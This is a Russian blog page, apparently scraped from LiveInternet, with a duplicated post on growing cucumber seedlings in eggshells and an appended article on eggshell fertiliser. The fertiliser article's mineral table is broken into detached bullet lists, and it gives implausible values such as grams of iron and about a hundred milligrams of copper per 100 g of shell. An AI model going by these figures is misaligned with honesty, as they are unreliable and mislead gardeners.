4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Об огурцах яичной скорлупе и телепередачах

LiveInternetLiveInternet

Рубрики

  • Вязание (581)
  • Деткам (39)
  • Аудиокниги (153)
  • Стихи (38)
  • (0)
  • Видео (228)
  • Кошки (116)
  • Винтаж (224)
  • Винтажные открытки (112)
  • Винтажные этикетки (12)
  • Открытки. Пасха (17)
  • Декупаж (1458)
  • Картинки для декупажа (1054)
  • Мои работы (8)
  • Картинки для декупажа. Цветы (121)
  • Картинки. Детки (45)
  • Картинки: Новый год, Рождество (237)
  • Трафареты (30)
  • Для дневника (3)
  • Живопись (5061)
  • Анималисты (144)
  • Русские художники (129)
  • Иконы (69)
  • Городское (299)
  • Деревенское (225)
  • Дети в живописи (253)
  • Жанровая живопись (812)
  • Избранное (621)
  • Иллюстрации (481)
  • История картины (92)
  • Кошки и мышки (272)
  • Красавицы (426)
  • Море (129)
  • Натюрморты (279)
  • О музыке (24)
  • Охота и рыбалка (28)
  • Пейзаж (638)
  • Портрет (159)
  • Уютные домики (92)
  • Фэнтези (326)
  • Храмовое (84)
  • Цветы (287)
  • искусство (557)
  • Антикварная лавка (43)
  • Интерьер (211)
  • Скульптура (17)
  • Фотографии (240)
  • Куклы (15)
  • Кулинарные рецепты (284)
  • Мастер-классы (1611)
  • Вебинары (101)
  • Рецепты холодного фарфора (29)
  • Витражи (6)
  • Живопись (5)
  • Валяние (2)
  • Гипс (38)
  • Готовые изделия разные (313)
  • Декупаж (561)
  • Для сада и огорода (6)
  • Игрушки (53)
  • Имитация поверхностей (263)
  • Колористика (16)
  • крашение тканей (3)
  • Лепка из полимерной глины (76)
  • Мыловарение (7)
  • Папье-маше (27)
  • Пасха (11)
  • Плетение (15)
  • Поделки из бумаги (31)
  • Работа с картоном (29)
  • Роспись (28)
  • Точечная роспись (14)
  • Фотошоп (40)
  • Цветы из ткани и бумаги (44)
  • Шитье и вязание (105)
  • Материалы для декупажа (27)
  • Мода. Стиль (105)
  • Музыка (164)
  • Классика (110)
  • Попса (6)
  • Про жизнь (332)
  • Медицина (50)
  • Прогулки по Москве (18)
  • Сад, огород. (68)
  • Фильмы (19)

Поиск по дневнику

Подписка по e-mail

Интересы

Постоянные читатели

Сообщества

Статистика

Об огурцах, яичной скорлупе и телепередачах

Четверг, 21 Марта 2013 г. 10:57 + в цитатник

Об огурцах, яичной скорлупе и телепередачах

Начну с конца – о телепередачах. Точнее – об одной телепередаче. Сразу оговорюсь, что, естественно, я абсолютно точно знаю, как она называлась раньше, как называется сейчас, на каком канале идет, как зовут ведущего и остальных действующих «вещающих» лиц. Но не назову, чтобы никого не обидеть. Так вот, насколько обаятелен ее ведущий, насколько он мне нравится, настолько мне не нравится сама передача, некоторые ее участники, то, как снимают операторы (хотя, возможно, это режиссер откровенно тупит порой), то, о чем и как они говорят. Чего стоит, например такой гениальнейший совет: Если один из супругов любит смотреть перед сном телевизор, а другой — нет, то спальные места следует располагать «валетиком»: одно — лицом к телевизору, а второе — головой к нему! Веселуха, понимаете ли! Или, опять же например, определение качества колготок разных фирм путем демонстрации надевания их разными женщинами на свои ноги! Слов нет!
Короче – я эту передачу больше НЕ СМОТРЮ! Иногда переключаешь каналы и попадаешь на нее, пару минут посмотришь и еще более убеждаешься в своем пристрастии. Но вот сегодня случайно попала на эпизод, который меня таки заинтересовал, и я на несколько минут задержалась, чтобы посмотреть и послушать. Из полубреда, несущегося с экрана, мне удалось выцепить некоторое зерно. Далее я телевизор выключила и пошла уточнять сведения в компьютере.

Тетенька в телевизоре взахлеб рассказывала о том, что все вокруг просто «с ума сошли» от ее изобретения. Не собираюсь оспаривать авторство, не моя это задача, но, оказывается, сведения об этом методе уже давно бродят по сети и другим СМИ, судя по датам публикаций.

Речь идет о выращивании рассады огурцов (а, возможно, и других бахчевых культур) в яичной скорлупе.

Публикацию этой своей записи откладываю до завтра, т.к. только завтра появится в сети ролик с трансляцией сегодняшней передачи – надо кое-что уточнить.

А пока размещаю сведения, которые удалось добыть из интернета. Следующий текст не мой, а скомпонован из нескольких статей:
Елены Мицкевич, дачницы, а также Блог полезных советов , Горшочки под рассаду и еще Огородные шпаргалки.

Общеизвестно, что семена огур­цов плохо всходят или вообще не прорастают, а рассада болезнен­но реагирует на пересадки. И тут на помощь приходит проверенный метод посад­ки огурцов — в яичную скорлупу
Огурцы на рассаду лучше всего сеять в конце апреля — начале мая, а яичной скорлупой и поддонами для яиц следует запастись заранее. Благодаря им, рассаду можно разместить и на узком подоконнике.
Прежде чем приступить к посеву, семена нужно отсортировать. Лучше опустить их на 10 минут в раствор соли (5 г на 100 мл воды комнатной температуры), пустые сразу же всплывут. Слейте их вместе с раствором, а осевшие на дно полноценные семена промойте и просушите, если не намерены сеять их сразу.
Следующий этап подготовки семян — обеззараживание. Для этого приготовьте 1-процентный раствор перманганата калия (1 г на 100 мл воды) и на 20 минут опустите в него семена, а затем хорошо промойте их под проточной водой. Подготовленную для посева почву тоже продезинфицируйте розовым раствором марганцовки.

Яичная скорлупа содержит кальций — один из важнейших элементов питания, улучшает структуру почвы и повышает эффективность минеральных удобрений.
Для того, чтобы вырастить рассаду в яичной скорлупе, необходимо предварительно насобирать миниатюрные «горшочки». Когда вы используете яйца для приготовления еды, не разбивайте их пополам, как обычно, а аккуратно сбейте ножом верхушку и слейте содержимое. После этого яичную скорлупу необходимо прокипятить – продезинфицировать.


Аккуратно проткните дно скорлупы «цыганской» иголкой или шилом – для стока излишней воды (протыкать необходимо с внутренней стороны вращательными движениями, очень аккуратно, иначе скорлупа может треснуть).

Яичные поддоны разрезаем так, чтобы в них встал один ряд (можно и больше) яичной скорлупы (она должна быть хорошо просушена). Наполняем ее подготовленной почвой, укладываем по одному семени и присыпаем 1-2 см рыхлой земли, поливаем и накрываем посевы прозрачной пленкой. Поскольку количество почвы в скорлупе ограничено, нужно следить, чтобы она не пересыхала, и поливать каждый день (1 чайная ложка на растение). Примерно на пятый день, когда огурцы взойдут, пленочное укрытие нужно снять, продолжая следить за влажностью почвы. Еще около двух недель они будут расти на подоконнике.

При установлении теплой погоды рассаду пора выносить на улицу для закалки, а затем в стадии 2-3 настоящих листьев ее высаживают на постоянное место под временные пленочные укрытия.
Все знают, что из-за слабой корневой системы огурцы после пересадки долго болеют, а могут и вообще погибнуть. При такой системе выращивания рассаду не нужно извлекать из скорлупы, а всего лишь примять ее, чтобы корни могли расти дальше. Такое переселение на новое место огурец даже не почувствует.
Как уже упоминалось, растение получает дополнительное свежее удобрение: в яичной скорлупе содержится много извести, необхо­димой для роста, к тому же, известь снижает кислотность почвы. Как любое известковое вещество, скорлу­па улучшает структуру почвы и повышает эффективность минеральных удобрений, поэтому рассада быстро набирает силу и, как результат, дает впоследствии хороший урожай.

У Елены Мицкевич для огурцов есть специальная тепличка. Боковые стенки ее изготовлены из старых оконных рам. Крыша легко открывается и закрывается и состоит из прибитой по коньку пленки, закрепленной по краям на планки. Это облегчает посадку, прополку, полив.
А когда огурцы подрастут, пленка отворачивается к центру и огурцы подвязывают на дополнительно установленные шпалеры. В качестве подкормки используем жидкий оксидат торфа, разведенный согласно инструкции.

Если синоптики предупреждают о ночных заморозках, вечером растения хорошо полить и в теплицу на ночь поставить трехлитровые банки с кипятком, закрытые крышками.

Источники:

Дописано через день.

Ну вот, посмотрела я еще раз ролик. Еще раз подивилась на полубред, который выдает на всю страну эта, думаю, образованная и неглупая женщина. Ну да не в этом дело.

Будем думать о практическом применении вышеописанного метода.

Заранее прошу прощения за низкое качество скриншотов — не знаю я, как делать их лучше.

Как видите, растение уже достаточно развитое — с цветами и даже завязью (некоторые из них агроном уже съела: один — до передачи, сама сказала, а второй — прямо перед камерой, уронив при этом кусочек).


Какие корешки и довольно толстенький стволик, хороший такой!

Но посмотрите на саму скорлупу! Во-первых, отверстие сверху очень маленькое, гораздо меньше, чем предлагают делать в других статьях. Я не вижу особого смысла — лишь бы стебелечку не было тесно и поливать удобно. Но возникает вопрос: каким образом эта скорлупа заполнялась землей? Через воронку?

Далее. Нижнее отверстие — наоборот, гораздо больше. Оно и понятно: если корни не помещаются в скорлупе, они же должны куда-то расти.



Отсюда вопрос номер два: эту дырочку расширяли уже потом, по мере надобности? Или все-таки сразу? Если потом, то есть опасность повредить корешки. А если сразу, то в связи с равностью этого отверстия верхнему, через которое почву засыпали, не существует ли вероятности, что через него земля с успехом может и высыпаться? Или как?

И последний вопрос. Если из скорлупки-«горшочка» торчит такой длинный «хвост», то в какой «таре» это всё держать?

Если кто-то из огородников прочитает мой бред, то, может, поделится своим мнением?

Как вырастить рассаду огурцов в яичной скорлупе

Вырастить огурцы через рассаду – задача не из лёгких. Огурчики не любят пересадки, от которой частенько болеют и медленней растут. Но и с посевом спешить нельзя: если почва в огороде не прогрелась хотя бы до +15 градусов, огурцы не взойдут и дорогостоящие фирменные семена пропадут.

Получить ранний урожай этой культуры позволяет выращивание рассады огурцов в яичной скорлупе.

Для этого я всю зиму собираю яичную скорлупу и кассеты, в которых в магазинах продают яйца. Я стараюсь разбивать яички таким образом, чтобы у них откалывалась лишь верхняя «шапочка», а большая часть скорлупки оставалась целой.

В каждой скорлупке я делаю шилом или толстой иголкой отверстие для стока воды. Через широкое отверстие я заполняю скорлупки рассадным субстратом и помещаю в каждую компактную ёмкость по два огуречных семечка. Слабое растение в дальнейшем удаляю.

Скорлупки с грунтом аккуратно перемещаю в яичные упаковки, которые, в свою очередь, переношу в пластиковый ящик. На дно ящика я насыпаю 1-2 сантиметра чуть влажного песка песка.

Не забывайте всё время следить, чтобы почва в скорлупках не пересыхала.

Если поставить яичные коробки рядом с кухонной плитой или возле батареи, всходы появятся очень быстро, в течение 5-7 дней. Поэтому я советую приступать к выращиванию рассады огурца в яичной скорлупе не раньше 20 апреля. Срок хорошо подходит для средней полосы.

Огуречным сеянцам в скорлупках нужен лишь редкий полив и совсем не требуются подкормки. Дело в том, что тонкая плёнка, выстилающая яйцо изнутри, оказывает стимулирующий эффект на молодые растения.

Когда весенняя погода окончательно устаканится и исчезнет опасность возвратных морозов, я высаживаю огурчики на грядку. Для этого я просто слегка сдавливаю скорлупу, чтобы она треснула, и высаживаю растения прямо в ней.

Благодаря этому методу выращивания огурчиков мы собираем первые долгожданные зеленцы на 20-30 дней раньше наших соседей, которые не любят возиться с рассадой.

А ещё рассаду огурцов выращивают не только в яичной скорлупе, но и в самих кассетах из-под яиц. Для этого в ячейки насыпают плодородной земли, поливают и сажают в каждую по 1-2 огуречных семечка.

Далее действуйте по описанной выше схеме. Когда семена проклюнутся, срезают верхнюю крышку и подставляют её под нижнюю часть. Таким образом, вы добьётесь большей прочности конструкции.

Как только огурчики развернут семядольки, их пикируют в открытый грунт или в ёмкости большего объёма. Делается это элементарно: подцепите комочек земли с сеянцем вилкой, прищипните торчащий корешок и опустите растение в лунку.

Я обнаружила, что выращивание рассады огурчиков в яичной скорлупе имеет два плюса: приближает время сбора первого урожая на 1-2 недели и обеспечивает 100%-ю приживаемость растений после высадки.

А чтобы урожай огурцов был по-настоящему ранним, выбирайте скороспелые сорта и гибриды этой культуры. Сделать выбор вам поможет эта статья.

Предлагаю также посмотреть видео и оценить ещё один интересный способ выращивания рассады огурцов. Если вам он понравится и вы захотите его применить, я советую заполнять кассеты максимально рыхлой почвой. Это облегчит пикировку огуречной рассады.

LiveInternetLiveInternet

Музыка

Приложения

  • Программа телепередачУдобная программа телепередач на неделю, предоставленная Akado телегид.
  • ОткрыткиПерерожденный каталог открыток на все случаи жизни
  • Я — фотографПлагин для публикации фотографий в дневнике пользователя. Минимальные системные требования: Internet Explorer 6, Fire Fox 1.5, Opera 9.5, Safari 3.1.1 со включенным JavaScript. Возможно это будет рабо
  • Онлайн-игра «Большая ферма»Дядя Джордж оставил тебе свою ферму, но, к сожалению, она не в очень хорошем состоянии. Но благодаря твоей деловой хватке и помощи соседей, друзей и родных ты в состоянии превратить захиревшее хозяйст
  • Всегда под рукойаналогов нет ^_^ Позволяет вставить в профиль панель с произвольным Html-кодом. Можно разместить там банеры, счетчики и прочее

Метки

Видео

Ссылки

Рубрики

  • Архитектура (61)
  • Энциклопедии, словари (14)
  • Астрономия (9)
  • Библиотека (36)
  • Видео (176)
  • Вязание (328)
  • Игрушки (10)
  • Модели (74)
  • Салфетки, пледы и прочая (27)
  • Школа вязания (крючок) (91)
  • Школа вязания (спицы) (42)
  • География, карты (78)
  • Города (151)
  • Декоративно-прикладное искусство (150)
  • Декупаж (321)
  • Мастер-классы (157)
  • Мои работы (16)
  • Декупаж-справочник (160)
  • Краски, рисование, фоны, тени (53)
  • Подготовка поверхности. Советы. Инструменты (28)
  • Салфетки. Декупажные карты. Распечатки (22)
  • Кракле (19)
  • Структура, рельеф, объем (16)
  • Патина, поталь, битум и другие (10)
  • Лаки (9)
  • Клей (3)
  • Домоводство, полезные советы (57)
  • Достопримечательности (57)
  • Живопись (232)
  • Животный мир (103)
  • Кошки-котики (22)
  • Замки (50)
  • Игры, тесты (7)
  • Интерьер (10)
  • Искусство (45)
  • История (115)
  • Картинки (305)
  • Компьютер, Интернет (226)
  • Для ЛиРу (60)
  • Рамки, фоны (102)
  • Фотошоп (39)
  • Красота и здоровье (60)
  • Кулинария (430)
  • Выпечка (200)
  • десерт (44)
  • мясо, птица (29)
  • салаты, закуски (26)
  • Овощи-фрукты + заготовки (59)
  • Личное (107)
  • Личности (69)
  • Актеры (25)
  • Мода (12)
  • Музыка (87)
  • Натюрморты (115)
  • Необыкновенные творения рук человека (73)
  • Пейзажи (143)
  • По России (186)
  • Москва (55)
  • Санкт-Петербург (24)
  • Сибирь (31)
  • По странам и континентам (481)
  • Азия (45)
  • 100 чудес света (11)
  • Америка (25)
  • Африка (8)
  • Бельгия, Голландия (13)
  • Ближний Восток (15)
  • Великобритания (49)
  • Германия (24)
  • Греция (6)
  • Европа (62)
  • Испания, Португалия (18)
  • Италия (28)
  • Китай (6)
  • Острова (15)
  • США (46)
  • Украина (11)
  • Франция (32)
  • Поэзия (13)
  • Природа (189)
  • Психология (2)
  • Путешествия (73)
  • Растения (43)
  • Рукоделие (669)
  • Роспись (51)
  • Вышивка (13)
  • Плетение (10)
  • Из бумаги (82)
  • из ничего (71)
  • Пластика (64)
  • Новый год (66)
  • Поделки (118)
  • Шитье (50)
  • Сад, огород (71)
  • Сады-парки, ландшафтный дизайн (111)
  • События (15)
  • Техника (5)
  • Фотографии (385)
  • Макро (33)
  • Теория (10)
  • Храмы, монастыри (55)
  • Цветы (335)
  • Это интересно (110)
  • Тайны, загадки (25)
  • Юмор (28)
  • Явления и объекты природы (111)

Всегда под рукой

Поиск по дневнику

Друзья

Постоянные читатели

Сообщества

Статистика

Об огурцах, яичной скорлупе и телепередачах

Четверг, 21 Марта 2013 г. 10:43 + в цитатник

Начну с конца – о телепередачах. Точнее – об одной телепередаче. Сразу оговорюсь, что, естественно, я абсолютно точно знаю, как она называлась раньше, как называется сейчас, на каком канале идет, как зовут ведущего и остальных действующих «вещающих» лиц. Но не назову, чтобы никого не обидеть. Так вот, насколько обаятелен ее ведущий, насколько он мне нравится, настолько мне не нравится сама передача, некоторые ее участники, то, как снимают операторы (хотя, возможно, это режиссер откровенно тупит порой), то, о чем и как они говорят. Чего стоит, например такой гениальнейший совет: Если один из супругов любит смотреть перед сном телевизор, а другой — нет, то спальные места следует располагать «валетиком»: одно — лицом к телевизору, а второе — головой к нему! Веселуха, понимаете ли! Или, опять же например, определение качества колготок разных фирм путем демонстрации надевания их разными женщинами на свои ноги! Слов нет!
Короче – я эту передачу больше НЕ СМОТРЮ! Иногда переключаешь каналы и попадаешь на нее, пару минут посмотришь и еще более убеждаешься в своем пристрастии. Но вот сегодня случайно попала на эпизод, который меня таки заинтересовал, и я на несколько минут задержалась, чтобы посмотреть и послушать. Из полубреда, несущегося с экрана, мне удалось выцепить некоторое зерно. Далее я телевизор выключила и пошла уточнять сведения в компьютере.

Тетенька в телевизоре взахлеб рассказывала о том, что все вокруг просто «с ума сошли» от ее изобретения. Не собираюсь оспаривать авторство, не моя это задача, но, оказывается, сведения об этом методе уже давно бродят по сети и другим СМИ, судя по датам публикаций.

Речь идет о выращивании рассады огурцов (а, возможно, и других бахчевых культур) в яичной скорлупе.

Публикацию этой своей записи откладываю до завтра, т.к. только завтра появится в сети ролик с трансляцией сегодняшней передачи – надо кое-что уточнить.

А пока размещаю сведения, которые удалось добыть из интернета. Следующий текст не мой, а скомпонован из нескольких статей:
Елены Мицкевич, дачницы, а также Блог полезных советов , Горшочки под рассаду и еще Огородные шпаргалки.

Общеизвестно, что семена огур­цов плохо всходят или вообще не прорастают, а рассада болезнен­но реагирует на пересадки. И тут на помощь приходит проверенный метод посад­ки огурцов — в яичную скорлупу
Огурцы на рассаду лучше всего сеять в конце апреля — начале мая, а яичной скорлупой и поддонами для яиц следует запастись заранее. Благодаря им, рассаду можно разместить и на узком подоконнике.
Прежде чем приступить к посеву, семена нужно отсортировать. Лучше опустить их на 10 минут в раствор соли (5 г на 100 мл воды комнатной температуры), пустые сразу же всплывут. Слейте их вместе с раствором, а осевшие на дно полноценные семена промойте и просушите, если не намерены сеять их сразу.
Следующий этап подготовки семян — обеззараживание. Для этого приготовьте 1-процентный раствор перманганата калия (1 г на 100 мл воды) и на 20 минут опустите в него семена, а затем хорошо промойте их под проточной водой. Подготовленную для посева почву тоже продезинфицируйте розовым раствором марганцовки.

Яичная скорлупа содержит кальций — один из важнейших элементов питания, улучшает структуру почвы и повышает эффективность минеральных удобрений.
Для того, чтобы вырастить рассаду в яичной скорлупе, необходимо предварительно насобирать миниатюрные «горшочки». Когда вы используете яйца для приготовления еды, не разбивайте их пополам, как обычно, а аккуратно сбейте ножом верхушку и слейте содержимое. После этого яичную скорлупу необходимо прокипятить – продезинфицировать.


Аккуратно проткните дно скорлупы «цыганской» иголкой или шилом – для стока излишней воды (протыкать необходимо с внутренней стороны вращательными движениями, очень аккуратно, иначе скорлупа может треснуть).

Яичные поддоны разрезаем так, чтобы в них встал один ряд (можно и больше) яичной скорлупы (она должна быть хорошо просушена). Наполняем ее подготовленной почвой, укладываем по одному семени и присыпаем 1-2 см рыхлой земли, поливаем и накрываем посевы прозрачной пленкой. Поскольку количество почвы в скорлупе ограничено, нужно следить, чтобы она не пересыхала, и поливать каждый день (1 чайная ложка на растение). Примерно на пятый день, когда огурцы взойдут, пленочное укрытие нужно снять, продолжая следить за влажностью почвы. Еще около двух недель они будут расти на подоконнике.

При установлении теплой погоды рассаду пора выносить на улицу для закалки, а затем в стадии 2-3 настоящих листьев ее высаживают на постоянное место под временные пленочные укрытия.
Все знают, что из-за слабой корневой системы огурцы после пересадки долго болеют, а могут и вообще погибнуть. При такой системе выращивания рассаду не нужно извлекать из скорлупы, а всего лишь примять ее, чтобы корни могли расти дальше. Такое переселение на новое место огурец даже не почувствует.
Как уже упоминалось, растение получает дополнительное свежее удобрение: в яичной скорлупе содержится много извести, необхо­димой для роста, к тому же, известь снижает кислотность почвы. Как любое известковое вещество, скорлу­па улучшает структуру почвы и повышает эффективность минеральных удобрений, поэтому рассада быстро набирает силу и, как результат, дает впоследствии хороший урожай.

У Елены Мицкевич для огурцов есть специальная тепличка. Боковые стенки ее изготовлены из старых оконных рам. Крыша легко открывается и закрывается и состоит из прибитой по коньку пленки, закрепленной по краям на планки. Это облегчает посадку, прополку, полив.
А когда огурцы подрастут, пленка отворачивается к центру и огурцы подвязывают на дополнительно установленные шпалеры. В качестве подкормки используем жидкий оксидат торфа, разведенный согласно инструкции.

Если синоптики предупреждают о ночных заморозках, вечером растения хорошо полить и в теплицу на ночь поставить трехлитровые банки с кипятком, закрытые крышками.

Источники:

Дописано через день.

Ну вот, посмотрела я еще раз ролик. Еще раз подивилась на полубред, который выдает на всю страну эта, думаю, образованная и неглупая женщина. Ну да не в этом дело.

Будем думать о практическом применении вышеописанного метода.

Заранее прошу прощения за низкое качество скриншотов — не знаю я, как делать их лучше.

Как видите, растение уже достаточно развитое — с цветами и даже завязью (некоторые из них агроном уже съела: один — до передачи, сама сказала, а второй — прямо перед камерой, уронив при этом кусочек).


Какие корешки и довольно толстенький стволик, хороший такой!

Но посмотрите на саму скорлупу! Во-первых, отверстие сверху очень маленькое, гораздо меньше, чем предлагают делать в других статьях. Я не вижу особого смысла — лишь бы стебелечку не было тесно и поливать удобно. Но возникает вопрос: каким образом эта скорлупа заполнялась землей? Через воронку?

Далее. Нижнее отверстие — наоборот, гораздо больше. Оно и понятно: если корни не помещаются в скорлупе, они же должны куда-то расти.



Отсюда вопрос номер два: эту дырочку расширяли уже потом, по мере надобности? Или все-таки сразу? Если потом, то есть опасность повредить корешки. А если сразу, то в связи с равностью этого отверстия верхнему, через которое почву засыпали, не существует ли вероятности, что через него земля с успехом может и высыпаться? Или как?

И последний вопрос. Если из скорлупки-«горшочка» торчит такой длинный «хвост», то в какой «таре» это всё держать?

Если кто-то из огородников прочитает мой бред, то, может, поделится своим мнением?

P.S. Комментарии типа «Спасибо! Обязательно попробую!» мне не интересны!

Рубрики: Сад, огород

Процитировано 6 раз
Понравилось: 5 пользователям

Как приготовить подкормку из яичной скорлупы для обильного урожая огурцов и томатов

Ценность яичной скорлупы в качестве удобрения обусловлена большим содержанием в ней кальция и других микро- и макроэлементов, необходимых огородным культурам для здорового развития и хорошего плодоношения.

Скорлупу можно использовать для подкормки картофеля, болгарского перца, баклажанов, цветной капусты. Но наибольшую популярность удобрение получило в качестве средства для повышения урожайности огурцов и помидоров.

Польза яичной скорлупы для томатов и огурцов

Удобрение из яичной скорлупы используют для корневых подкормок. Скорлупа не только питает растения, но и благотворно влияет на качество грунта:
  1. Насыщение кальцием. Скорлупа содержит большую концентрацию элемента, и что немаловажно – в легко усваиваемой растениями форме.
  2. Снижение кислотности. И огурцы, и томаты нуждаются в нейтральных или слабокислых грунтах. Преимущество скорлупы перед такими средствами для известкования, как мел или известь, в том, что она быстрее «воспринимается» почвой.
  3. Улучшение структуры. Для выращивания помидоров и огурцов не подходят тяжелые, глинистые грунты. Внесение измельченной скорлупы делает почву рыхлой и воздухопроницаемой. Такой эффект сохраняется в течение нескольких лет, поскольку яичная скорлупа очень медленно разлагается.

Минимальный срок разложения продукта (при гниении в компостной яме) составляет не менее 2 лет. В грунте полная переработка происходит не быстрее, чем разложение костных тканей. Но, несмотря на прочность скорлупы, питательные вещества из нее выделяются интенсивно, быстро повышая плодородность почвы.

Ценные элементы

Помимо кальция, скорлупа является источником и других минеральных веществ, полезных для помидоров и огурцов.

· развитие корневой системы;

· наращивание зеленой массы;

· иммунитет к болезням;

· устойчивость к перепадам температур;

· улучшение вкуса плодов;

· повышение лежкости плодов.

· развитие корневой системы;

· рост плодов.

· наращивание зеленой массы;

· стимуляция цветения.

· формирование завязей.

· улучшение вкуса плодов.

· улучшение вкуса плодов.

· развитие корневой системы;

· формирование завязей.

· развитие корневой системы;

· улучшение вкуса плодов.

· рост и созревание плодов;

· улучшение вкуса плодов.

· улучшение вкуса плодов.

· развитие корневой системы;

· образование цветков.

· устойчивость к неблагоприятным погодным условиям;

· иммунитет к болезням;

· рост плодов.

· иммунитет к болезням;

· устойчивость к неблагоприятным погодным условиям;

· улучшение вкуса плодов.

· накопление в плодах витамина C.

· улучшение вкуса плодов.

· улучшение вкуса плодов.

элемент содержание в 100 г польза элемента для огурцов польза элемента для томатов
кальций 34-37 г
железо 2,8 г
сера 0,6-1,2 г
цинк 0,4-0,6 г
фосфор 121-188 мг
магний 106-113 мг
медь 92-150 мг
калий 83-93 мг
йод 34-60 мг
молибден 28-36 мг

Сбор и подготовка сырья

Для удобрения подходит не только скорлупа куриных яиц, можно использовать «продукцию» от любых домашних птиц. Самыми полезными считаются перепелиные яйца, поскольку в их скорлупе содержится наибольший объем микроэлементов.

По этой же причине более ценной является сырая скорлупа – под воздействием высоких температур при варке яиц часть полезных веществ теряется. Тем не менее рекомендуется прокаливание сырья в духовке – потери в этом случае компенсируется более активным высвобождением кальция.

При заготовке сырья следует ориентироваться на размер посадки. Для улучшения качества грунта на один квадрат грядок требуется около 40-50 яиц. Но при правильной обработке и хранении скорлупа может не терять своих полезных качеств в течение года, поэтому накопить нужный объем несложно.

Целесообразнее приобретать яйца коричневого цвета, поскольку их скорлупа толще, чем у белых. Наиболее плотной оболочкой при прочих равных обладают яйца, снесенные в зимнее время.

Как хранить яичную подкормку

Чтобы сырье не испортилось при хранении, скорлупу нужно тщательно промыть и высушить. Просушивание в духовке предпочтительнее, поскольку уничтожает бактерии и грибки, способные запустить процессы гниения.

Сухую скорлупу измельчают в ступке или кофемолке и помещают в бумажный пакет. Не стоит хранить в стеклянной, пластиковой таре или полиэтиленовых пакетах – эти материалы непроницаемы для воздуха, поэтому есть риск запревания и порчи сырья. Появление неприятного запаха от порошка указывает, что продукт испорчен.

Рецепты удобрения из яичной скорлупы

Яичную скорлупу можно вносить под огородные культуры в сухом или жидком виде, приготовив из нее настой. Можно сказать, что сухая подкормка – стратегическое, настой – тактическое средство. Жидкая подкормка позволяет быстро напитать растение кальцием, но не обогатит почву, тогда как сухая скорлупа усваивается медленнее, но позволяет насытить грунт кальцием.

  1. Сухая подкормка. Измельченную яичную скорлупу добавляют в лунку для высадки рассады, либо смешивают с почвой во время перекопки.
  2. Настой. Молотое сырье нужно залить кипящей водой из расчета 1 литр на скорлупу от 10 яиц и дать настояться в течение пяти-семи суток. Время от времени настой следует взбалтывать и перемешивать, стимулируя процессы брожения. По истечении срока удобрение используют, разбавив 3 частями воды. Процеживать настой не обязательно.

Для снижения кислотности грунта

Используют порошок из скорлупы, смешивая его с почвой. Для известкования выраженно кислого грунта требуется около 0,5 кг карбоната кальция на 1м2. Следовательно, нужно внести 1,5 кг сырья на 1м2 грядок. Вес оболочки куриного яйца – около 5 г, то есть потребуется около 300 яиц. Для очень кислых и тяжелых грунтов эту цифру нужно увеличить в 2 раза.

Но такой объем удобрения нельзя вносить за один раз. Известкование яичной скорлупой нужно проводить регулярно в течение нескольких лет подряд, только в этом случае можно получить устойчивый и качественный результат. Процедуру рекомендуется проводить 2 раза в год – при перекопке грядок весной и осенью. В первый год нужно внести в совокупности около 250 грамм продукта (50 яиц) на 1 м2.

Ошибки при использовании удобрения

Несмотря на натуральность и пользу, использование яичной скорлупы в качестве удобрения имеет свои ограничения.
  1. Превышать дозировку. Избыток кальция в почве препятствует усвоению других полезных элементов – калия, бора, марганца, меди, цинка.
  2. Использовать свежую или плохо очищенную скорлупу. Это может привлечь к посадке вредителей. Кроме того, яичный белок, попадая в почву, становится благоприятной средой для развития бактерий, провоцируя болезни растений.
  3. Использовать крупные фрагменты. Чем мельче фракция сырья, тем больше микроэлементов будут доступны растениям. В идеале скорлупу нужно перемалывать в пудру.
  4. Рассыпать удобрение сверху почвы. Процесс усвоения полезных веществ в этом случае будет слишком долгим.

Опудривание рассады томатов порошком из яичной скорлупы помогает защитить растения от заболевания гнилью корневой шейки («черная ножка»).

Применение яичной подкормки для огурцов и томатов

Для огурцов кальций значим на ранних этапах развития. Поскольку элемент стимулирует рост корней и надземной части растений, а также повышает устойчивость к неблагоприятным условиям, подкормка яичной скорлупой в первую очередь полезна для рассады и после высадки растений в грунт, в период активного роста.

Варианты подкормок для огурцов

  1. Для подготовки рассады огурцов к пересадке производят полив жидким удобрением из скорлупы за 5-7 дней до высадки в грунт.
  2. С целью улучшить рост корней и набор зеленой массы, а также помочь растениям адаптироваться после пересадки, в лунку для высадки рассады следует положить 2 чайные ложки порошка из скорлупы.
  3. Поскольку всхожесть у огурцов не очень хорошая, яичный порошок может пригодиться и в качестве стимулятора прорастания семян. Необходимо присыпать посев тонким слоем яичной пудры (до засыпания семян субстратом).
  4. Рассаду огурцов, высаженную в открытый грунт, полезно замульчировать смесью компоста и скорлупы. Для этого вносят 500 г порошка на 10 кг компоста.

Томаты также нуждаются в кальции в начале вегетации. Помимо этого, кальциевая подкормка рекомендуется в период созревания плодов. Элемент требуется помидорам и для образования завязей, но во время цветения подкормку не дают – растение расходует ранее накопленные в тканях запасы.

Подкормка помидоров

Дефицит кальция у огурцов и томатов

Недостаток кальция может привести к замедлению роста, ослаблению корневой системы, повреждению верхушек у помидоров и огурцов, а также порче урожая томатов.

Дефицит кальция у огурцов проявляется:

  • появление желтой каймы по краю листа;
  • светлые полосы на листовой пластине;
  • скручиванием листьев краями вниз, утрата тургора и некроз;
  • измельчание и темно-зеленая окраска молодых листьев;
  • отмирание верхушек у побегов, начиная с основного стебля;
  • морщинистость плодов.

Симптомы недостатка кальция у томатов:

  • желтые пятна на молодых листьях;
  • потемнение окраски старых листьев;
  • деформация и засыхание листьев;
  • отмирание верхушек;
  • ускоренное созревание плодов;
  • появление вершинной гнили на плодах.

При признаках дефицита кальция необходимо быстро насытить растение элементом. Для огурцов на этот случай существует рецепт подкисленной настойки из скорлупы. Для ее приготовления 30-40 г порошка заливают 0,5 литра воды с добавлением чайной ложки уксуса. Настаивают в темном месте трое суток, после чего поливают огурцы, не разбавляя водой. Такая подкормка эффективна и в случае недостатка магния.

Использовать уксусно-яичный раствор для подкормки томатов нельзя. В случае нехватки кальция рекомендуется сделать внекорневую подкормку раствором кальциевой селитры (0,2%).

Советы и отзывы огородников

«Использую яичную скорлупу для известкования огородной земли вместе с древесной золой. Оба средства снижают кислотность, кроме того, получается отличная питательная смесь – яичная скорлупа дает кальций, зола – калий, фосфор. Особенно полезно для помидор, плоды растут заметно больше. Кстати, скорлупу можно не прокаливать в духовке, а сразу поджарить на костре вместе с золой».

